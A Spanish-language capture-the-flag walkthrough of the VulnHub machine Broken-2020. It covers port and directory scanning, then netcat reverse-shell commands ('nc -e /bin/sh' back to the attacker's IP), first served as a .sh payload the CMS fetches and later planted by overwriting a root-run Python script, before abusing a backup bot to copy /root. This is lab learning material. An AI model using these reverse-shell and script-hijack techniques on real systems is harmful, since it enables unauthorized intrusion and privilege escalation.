LaCashita!

[VLN] Broken-2020

Hoy vamos a hackear la maquina de Vulnhub llamada Broken-2020. Podeis descargarla desde el siguiente enlace: Broken-2020

Video

Enumeration

Empezamos con un nmap para ver que puertos tiene abiertos.


sml@Cassandra:~$ nmap -A -p- 192.168.1.32
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-07 15:53 CEST
Nmap scan report for 192.168.1.32
Host is up (0.00070s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 7e:f3:33:8c:be:0c:ed:d7:0e:c6:67:cc:73:bf:c0:ab (RSA)
|   256 ee:ed:74:02:0d:3f:7d:6d:45:aa:ff:f3:3a:d0:1a:d9 (ECDSA)
|_  256 d1:18:a9:ef:7f:b6:c8:a9:30:52:c8:e6:b6:ec:64:80 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Coming Soon
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.39 seconds

Vemos si tiene algo interesante en el Apache.


sml@Cassandra:~$ gobuster dir -u http://192.168.1.32/ -w 
/usr/share/wordlists/dirb/big.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.32/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/05/07 16:02:48 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/cms (Status: 301)
/fonts (Status: 301)
/images (Status: 301)
/server-status (Status: 403)
===============================================================
2020/05/07 16:02:58 Finished
===============================================================

Vamos a http://192.168.1.32/cms/ y pulsamos el boton. "Algo" se ha activado, lo cual nos ha "hackeado" el cms... Volvemos a http://192.168.1.32/cms/ y obtenemos la flag1. Ahora escaneamos el directorio cms para ver que encontramos.


sml@Cassandra:~$ gobuster dir -u http://192.168.1.32/cms -w 
/usr/share/wordlists/dirb/big.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.32/cms
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/05/07 16:02:19 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/cc (Status: 301)
===============================================================
2020/05/07 16:02:27 Finished
===============================================================

Exploitation

Vemos una carpeta llamativa asi que entramos en http://192.168.1.32/cms/cc. Vemos que la web nos pide IP y puerto... Ponemos un HTTP a la escucha, y ponemos la IP/puerto de nuestro server.


sml@Cassandra:~$ python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
192.168.1.32 - - [07/May/2020 16:00:21] "GET 
/d499dda8cfb8e278c0fa0bb9732a92d5.sh HTTP/1.0" 200 -

Podemos ver como se conecta a nuestro server y nos solicita un fichero.sh. Creamos un fichero con el nombre.sh que solicita, y de contenido ponemos que nos haga una shell inversa a nuestra maquina.


sml@Cassandra:~$ echo "nc -e /bin/sh 192.168.1.148 5555" > 
d499dda8cfb8e278c0fa0bb9732a92d5.sh

Low shell

Ponemos a la escucha..


sml@Cassandra:~$ nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.1.148] from (UNKNOWN) [192.168.1.32] 52750
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Ahora que tenemos una shell, exploramos un poco el sistema.


python -c 'import pty; pty.spawn("/bin/sh")'
$ cd /home
$ ls
alice
$ cd alice
$ ls
flag.txt  note.txt  script
$ cat flag.txt
cat flag.txt
{FLAG2:**Robing the rober**}
$ cat note.txt
Alice, 

Please do not install TrustMeCMS, I need check the source before

PS: I created a script to clear apache log during the tests

root

Miramos la carpeta script, y el script que ha creado root.


$ cd /home/alice/script
$ cat log.py
cat log.py
#!/usr/bin/python2.7
import requests
import os
import datetime

"""
#Juste in case I want stop this script remotly

r = requests.get("https://pastebin.com/raw/9vzu2CA5")

cmd=str(r.text)
check ="stopit"
if check == cmd :
        os.system('cp /home/alice/script/log.py /home/alice/script/log.bak')

"""
path="/var/log/apache2"
dir = os.listdir(path)
date = str(datetime.datetime.now())
for logfile in dir :
        clear = open(path+"/"+logfile, "w")
        clear.truncate(0)
        clear.close()
logfile = open("/home/alice/script/clear.log","w")
logfile.write("last clear apache log "+date)
logfile.close()

Podemos modificar la carpeta, asi que creamos un script en python con el mismo nombre, y que haga de nuevo una shell inversa hasta nuestra maquina


$ mv log.py log.bck
$ echo "#!/usr/bin/python2.7" >> log.py
$ echo "import os" >> log.py
$ echo "os.system('nc -e /bin/sh 192.168.1.148 5556')" >> log.py

Ponemos a la escucha de la nueva shell...y al rato...


sml@Cassandra:~$ nc -nlvp 5556
listening on [any] 5556 ...
connect to [192.168.1.148] from (UNKNOWN) [192.168.1.32] 46634
python -c 'import pty; pty.spawn("/bin/sh")'
$ id                                                                            
uid=1000(alice) gid=1000(alice) 
groupes=1000(alice),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev)
,109(netdev),111(bluetooth)

Exploramos de nuevo.

       
$ cd /home/alice                                                                   
$ ls                                                                            
backup  flag.txt  note.txt  script                                              
$ cd backup
$ ls
flag.txt  logbot.log  note.txt  path.txt
$ cat flag.txt
{FLAG3:**Power of snak**}
$ cat note.txt
cat note.txt
Alice we have been hacked !

Please put the path of the website backup directory in path.txt, my bot will do 
the rest

thx

root

La nota indica que pongamos el directorio que queremos recuperar, asi que ponemos /root :) y al poco tiempo....

(root)flag.txt


$ echo "/root" > path.txt
$ ls
flag.txt  logbot.log  note.txt  path.txt  root
$ cd root
$ ls
flag.txt  log.txt  test.py
$ cat flag.txt
Congratulation for the root flag !

     _________
    / ======= \
   / __________\
  | ___________ |
  | | -root-  | |
  | |         | |
  | |_________| 
|_____________________________________________________________________
  \=____________/                     enjoyed this VM ?                         
      )
  / """"""""""" \                     I love bitcoin                            
     /
 / ::::::::::::: \           1Ba6vFEamUenzrXr4scGQ8QLya7t7zYZ1S                 
 =D-'
(_________________)